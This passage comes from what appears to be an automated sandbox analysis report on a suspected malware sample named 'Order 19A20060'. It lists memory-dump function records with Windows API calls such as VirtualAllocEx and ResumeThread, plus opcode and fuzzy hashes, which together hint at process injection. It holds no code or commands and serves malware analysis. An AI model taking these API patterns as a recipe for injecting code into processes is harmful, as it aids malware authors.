                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: d5d3aeefa4887b2ddc6bc4ce499dacb0265921794621ef4bb4044aa41c8ed595
                                                                              • Instruction ID: 68d436e917ccd09c4a84dbbc87d2bf6ae5e88f124d3780049af57fba68da5433
                                                                              • Opcode Fuzzy Hash: d5d3aeefa4887b2ddc6bc4ce499dacb0265921794621ef4bb4044aa41c8ed595
                                                                              • Instruction Fuzzy Hash: 2F1123B68003489FDB10CFAAC884BDEFBF4EB48320F14842AD419A7250C375A545CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A8D9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 38d56a713752ed4755e85101c79a84e52b47732157ae19e1057e17240f89d1f0
                                                                              • Instruction ID: 0cd804a0dd02670d3b757d4306ba3a7789e3c3c455e02fe38b54a934be065e95
                                                                              • Opcode Fuzzy Hash: 38d56a713752ed4755e85101c79a84e52b47732157ae19e1057e17240f89d1f0
                                                                              • Instruction Fuzzy Hash: E51137B29002499FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C775A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 1bcd0ac7e50f2f77e6ef6d7016bcf0db04f0c71a9740fc3c0e4ddbc9b75ebeaf
                                                                              • Instruction ID: 42a0f2d48e8437bd8a66b694d1839488c4c16d500683916d816487193c2932fc
                                                                              • Opcode Fuzzy Hash: 1bcd0ac7e50f2f77e6ef6d7016bcf0db04f0c71a9740fc3c0e4ddbc9b75ebeaf
                                                                              • Instruction Fuzzy Hash: B71158B19002598BCB20DFAAD4457DEFBF4EB88324F24882AD459A7650C635A944CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: b751a5173d8674452c07a6ac683d5c4f16caf369bef0e54160b812af9412d39d
                                                                              • Instruction ID: 2ed726115911cfaa0d9077ebc78deed3cfc052c365c60d039bf6901e9d30eb82
                                                                              • Opcode Fuzzy Hash: b751a5173d8674452c07a6ac683d5c4f16caf369bef0e54160b812af9412d39d
                                                                              • Instruction Fuzzy Hash: 071136B1D003598FCB20DFAAC4457DEFBF5EB88324F248829D559A7250CB75A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AC01265
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: faead0d455e11fc51c77aa71bd75c62680aca938db725f2fb9e054b88b90a612
                                                                              • Instruction ID: d06ab2ac4694cd5d3c546e2aad620059e1fa60f969c47e273a10c23eb07bd623
                                                                              • Opcode Fuzzy Hash: faead0d455e11fc51c77aa71bd75c62680aca938db725f2fb9e054b88b90a612
                                                                              • Instruction Fuzzy Hash: F511F2B58003499FCB10CF9AD885BDEFFF8EB48324F14845AE558A7650C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0300B0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 67b51af8efcedcedd17da302905ecf28233b9ad9e8b906d6d57a45381ea9367e
                                                                              • Instruction ID: 6a6ad91189bf545125cb10e363cae99c0e94bdb1c2c57e98aba7fe68e5105561
                                                                              • Opcode Fuzzy Hash: 67b51af8efcedcedd17da302905ecf28233b9ad9e8b906d6d57a45381ea9367e
                                                                              • Instruction Fuzzy Hash: E6110FB6C003498FDB20CF9AC544ADEFBF4EB88320F14842AD429A7250D375A549CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AC01265
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 942fbb9c11367cdc6414c3ae5165d2d780754ac6afd9ec9b07a39e57623029a5
                                                                              • Instruction ID: e9e7fc4d9b6e462b4b26ca7278254455bd1e4b4844e9b0eb1e252bf9f7cdb4f3
                                                                              • Opcode Fuzzy Hash: 942fbb9c11367cdc6414c3ae5165d2d780754ac6afd9ec9b07a39e57623029a5
                                                                              • Instruction Fuzzy Hash: EC1100B5800348DFCB10CF9AC884BDEFBF8EB48324F10841AE558A7250C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Te^q
                                                                              • API String ID: 0-671973202
                                                                              • Opcode ID: 913c362801238c2da3f31f875005274ba7b995338e5bbf4317b1a6d817e17dfe
                                                                              • Instruction ID: 496dfdde5a6344952c99d75e36abf35927fb6527cd0b98db5e4cceb7fa481856
                                                                              • Opcode Fuzzy Hash: 913c362801238c2da3f31f875005274ba7b995338e5bbf4317b1a6d817e17dfe
                                                                              • Instruction Fuzzy Hash: B1411AB4959209CFDB64CFA4D584BEEBBB6FB0A300F1091AAE519A7351C7349D44CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fc9b66328bbda5431b24c4da048707e1d43a536303cd17aa2beb82bf95c4dd5
                                                                              • Instruction ID: bc39ec407be8188605bb0eaa0a2a3bc77e416324cc21867e3c9ce5115c5cd779
                                                                              • Opcode Fuzzy Hash: 2fc9b66328bbda5431b24c4da048707e1d43a536303cd17aa2beb82bf95c4dd5
                                                                              • Instruction Fuzzy Hash: 077121B4E09218CFCB00DFE8D584AEDBBB5FB49301F10A51AE825A7255E7749858CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8986c9491fdd3152622dc215d1f7db5303057cfd998cf98b97a5f3c12d333a7c
                                                                              • Instruction ID: f1bd943104fe4cf078990e0bb7fd3b5d34ba89bd6bb6bb686a1422b00ba92aae
                                                                              • Opcode Fuzzy Hash: 8986c9491fdd3152622dc215d1f7db5303057cfd998cf98b97a5f3c12d333a7c
                                                                              • Instruction Fuzzy Hash: E0412BB4B19109CFCB08CF5AD1809BEBFFABF5E300F619195E429AB216D7349920CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a143e8aa240e734c1d3573dd34ab4aaacc835f4551970123e0d4e6fc9c06658d
                                                                              • Instruction ID: 1e73ec8a80ba807ebbf9d82ceedec18a85744d56e38cb9c750b6b203014e600a
                                                                              • Opcode Fuzzy Hash: a143e8aa240e734c1d3573dd34ab4aaacc835f4551970123e0d4e6fc9c06658d
                                                                              • Instruction Fuzzy Hash: 133102B5A05208CFCB00CF99D088AEDBBF6FB4E351F109095E41AA7259C7369E64CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
                                                                              • Instruction ID: 62a3ac8d5d63f5f207c2427facc11354e611b78ed677a4be9956a7d09404b288
                                                                              • Opcode Fuzzy Hash: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
                                                                              • Instruction Fuzzy Hash: F0213371550208DFCB11DF58E9C0B26BF65FB98B18F20C27DEA090B256C336D446CAE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
                                                                              • Instruction ID: fef700a294f8ef028209d5fb063101c7e67986fda7e94239ccf602d5ecca81c7
                                                                              • Opcode Fuzzy Hash: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
                                                                              • Instruction Fuzzy Hash: FD21FEB5110208DFDB11DF48C9C0B66BB65EB88724F20C27DEB094A256C336E446CAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677716328.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db113c001a62997e258c50ef1a256f279ddd75f5906f41608ae89362fe7854d6
                                                                              • Instruction ID: 1290642b3d17c1e5af2b324b71562b7b46b23edb7dbd87d625b5d5c7289c2c41
                                                                              • Opcode Fuzzy Hash: db113c001a62997e258c50ef1a256f279ddd75f5906f41608ae89362fe7854d6
                                                                              • Instruction Fuzzy Hash: 31210071604200DFCB15DF58D984B26BBA5EB84B14F20C57DD80A4B396C33AD447CAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677716328.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9efc68fb36c5f4035b95feba0c02ed3a5a1ec883a7e26464ab6fa5786635f24
                                                                              • Instruction ID: 81cc6ec0954904c70928b0548c7456c4f133329323d48d9093593735ad1ab81e
                                                                              • Opcode Fuzzy Hash: b9efc68fb36c5f4035b95feba0c02ed3a5a1ec883a7e26464ab6fa5786635f24
                                                                              • Instruction Fuzzy Hash: CF21D071504200EFDB05DF98D984B26BBA6FB84B24F20C67DEA494B356C33AD446CAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 81eca0d006aabbd1a7399cb4c04191791f43ef97c82951c38fbb74d7effea053
                                                                              • Instruction ID: 4b3bb702076ea2755e2dcf512cd58038cf12749ade4099762c957473a6d8fb42
                                                                              • Opcode Fuzzy Hash: 81eca0d006aabbd1a7399cb4c04191791f43ef97c82951c38fbb74d7effea053
                                                                              • Instruction Fuzzy Hash: 13210AF0E0520ADFDB08DFA9D1846AEBBF5FB88300F1085AAE424A7250D7349981CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f69d4efa3aee2f39e7b4855b3ae10ab0c9e6ba1220bbda554be024bcd99b4e26
                                                                              • Instruction ID: 23297022433f15fa25cfc0e64c771b130937936e8be4a1432ae830b4d3c1a3f8
                                                                              • Opcode Fuzzy Hash: f69d4efa3aee2f39e7b4855b3ae10ab0c9e6ba1220bbda554be024bcd99b4e26
                                                                              • Instruction Fuzzy Hash: 692167F4E15209DFCB44DFA9D5456AEBBF6FB49301F10956AE819A3340DB309E41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ddaea9c1bb48c052dd9457c1da5aa9957e7cd6db6d9b762daf5f0524c2eed6e5
                                                                              • Instruction ID: 3799525049dacbd164651c9713940647f8f9aaa57722c3ebceeefe8ac437fdf7
                                                                              • Opcode Fuzzy Hash: ddaea9c1bb48c052dd9457c1da5aa9957e7cd6db6d9b762daf5f0524c2eed6e5
                                                                              • Instruction Fuzzy Hash: 4C1176B4E15209DFCB44DFA9D5456AEBBF6FB89301F20D56AE819A3340DB309E41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: d576e73b1cb844f5849ae709227b1d4fa0f81980b4a3743ff840a7b07b7afb96
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 8C11E176404284CFCB12CF54E9C4B16BF71FB94718F24C6ADDA090B256C336D45ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: 987b9dc3b30d26108252c0e35849812bc2f2595bd8c0bf6e2aadd9375e111eeb
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 3B11CA76404284DFDB12CF44D9C4B56BF72FB94224F24C2ADDA090A256C33AE45ACBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 229941a505e37a20232c03792bdf94c8fb9e956094b4b78c7dccd7d16f12a126
                                                                              • Instruction ID: f38226849d52ee27c0f57282829953b065c41153fdeee0e987001703a17c3dc6
                                                                              • Opcode Fuzzy Hash: 229941a505e37a20232c03792bdf94c8fb9e956094b4b78c7dccd7d16f12a126
                                                                              • Instruction Fuzzy Hash: C4116AF4E19209CFCB04CFA9D5456AEBBB2EB89301F10D569E819A7350CA309E41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677716328.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction ID: 8973588c0eb8ff4308615cd2e80c15db684bd36a1208798e2c830c8c9cf52b85
                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction Fuzzy Hash: DE11BB76504280DFDB02CF54C9C4B25BFA2FB84624F24C6AED9494B396C33AD40ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677716328.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction ID: b09ff3dff72015dafaa7a927e3dc9b9c730c87c2a9b9cd3ac2b5d6e3aeda0562
                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction Fuzzy Hash: BC11BE75604280DFDB12CF58D9C4B25BF61FB84714F24C6AED8494B756C33AD40ACBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 088807674a248692f6ea9070f7aff078b6c23fcaaa6e433ac0aec04f1557ecc0
                                                                              • Instruction ID: 1ba327d379800087b5a1539eb7f1943037698bba42af21bbe4faf4fe99c6690b
                                                                              • Opcode Fuzzy Hash: 088807674a248692f6ea9070f7aff078b6c23fcaaa6e433ac0aec04f1557ecc0
                                                                              • Instruction Fuzzy Hash: 7111B3B4E1520ADFCF44DFA9D5455AEBBF5FB48300F20856AD819A3314EB345A41CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e022b6d2ad9f414a5bb6ea1157262743eb14d5a3bbbde353a6afa6e28dee362c
                                                                              • Instruction ID: 95916aa2b4dd777c68957c2df2813b48c222cfae7aa881847e258777a9dfd06b
                                                                              • Opcode Fuzzy Hash: e022b6d2ad9f414a5bb6ea1157262743eb14d5a3bbbde353a6afa6e28dee362c
                                                                              • Instruction Fuzzy Hash: 5901F7310183889AE7155A69CD84B67FF98DF45724F08C63EEF080A286D2799848C6F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1677516937.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_12cd000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: da464e8043602fb378ea4f63ba1a849103e7176a1ed3a1eda857ea9fb46f8b0f
                                                                              • Instruction ID: ea6d478d6f64a151e6b110e2d324c2cbf159f38e03dd731eac596cf10a9ebb7c
                                                                              • Opcode Fuzzy Hash: da464e8043602fb378ea4f63ba1a849103e7176a1ed3a1eda857ea9fb46f8b0f
                                                                              • Instruction Fuzzy Hash: 0AF06271404384AAE7158E1ACCC8B62FFA8EB45734F18C55EEE084B296D2799848CAB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 46e15b6140cf1176fbf0c2617b0ac4efb4e1c6490d3e4799718fdea224040111
                                                                              • Instruction ID: 6994c55f9685c588e6434467b3723fa41beb8596c31a18b704c325e91fae4130
                                                                              • Opcode Fuzzy Hash: 46e15b6140cf1176fbf0c2617b0ac4efb4e1c6490d3e4799718fdea224040111
                                                                              • Instruction Fuzzy Hash: 90F0C0B4E19209EFCB44DFA9D5415ACFFF8AB4A304F0090A6F819A3601EA345A54DB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af52bc28e679249cc63f74084a2dde62023bbf61a1fc960fa32ef5e2749e7779
                                                                              • Instruction ID: bb89404a0d4653d9a2775d0b6dd1010c3d16400f5b0544dae5b69223ae6de86c
                                                                              • Opcode Fuzzy Hash: af52bc28e679249cc63f74084a2dde62023bbf61a1fc960fa32ef5e2749e7779
                                                                              • Instruction Fuzzy Hash: 14F01CB0E09308EFCB80DFA8D94169DBBB5EB49200F1480EAA858D7342D6359E05CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 11902ce553053c39ea606a4f9bd829746a0020c933efeb7e1b4f106cb1b1ce14
                                                                              • Instruction ID: 3544163b4c6c8c8cf99ef1ec0a3812a505e6fa9daf545bae40e6cbbe4e565161
                                                                              • Opcode Fuzzy Hash: 11902ce553053c39ea606a4f9bd829746a0020c933efeb7e1b4f106cb1b1ce14
                                                                              • Instruction Fuzzy Hash: A6E06D70E06208DFCB44DFA8E4095ADBBB4FB4A300F10D1A9E428A3340D7785E14CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f68162f0943074110ca89b4cf6ea9faf008e416843b7514f28fa82b56b577c84
                                                                              • Instruction ID: 292c2f4c7e93c5443e8f0183a1c53d5c9bdd5ad5c8df2a2cf58af49c88e4e2e2
                                                                              • Opcode Fuzzy Hash: f68162f0943074110ca89b4cf6ea9faf008e416843b7514f28fa82b56b577c84
                                                                              • Instruction Fuzzy Hash: ACF082B4A14149CFCB20DF94D490BAEB7B5FB49340F10C0A5D50EA7744CA349D81CF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 609cf823358518385343faeb0376556e8d276953bc9a3f091075ed317433f992
                                                                              • Instruction ID: fceac8916dd7b3f5d253cf7593aaf756cc9da57f3c038984e7162fb9f901550c
                                                                              • Opcode Fuzzy Hash: 609cf823358518385343faeb0376556e8d276953bc9a3f091075ed317433f992
                                                                              • Instruction Fuzzy Hash: 88E0E5B4E05208EFCB84DFA8D5416ACFBF4EB88304F10C0A9E868A3340D6359A01DF80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
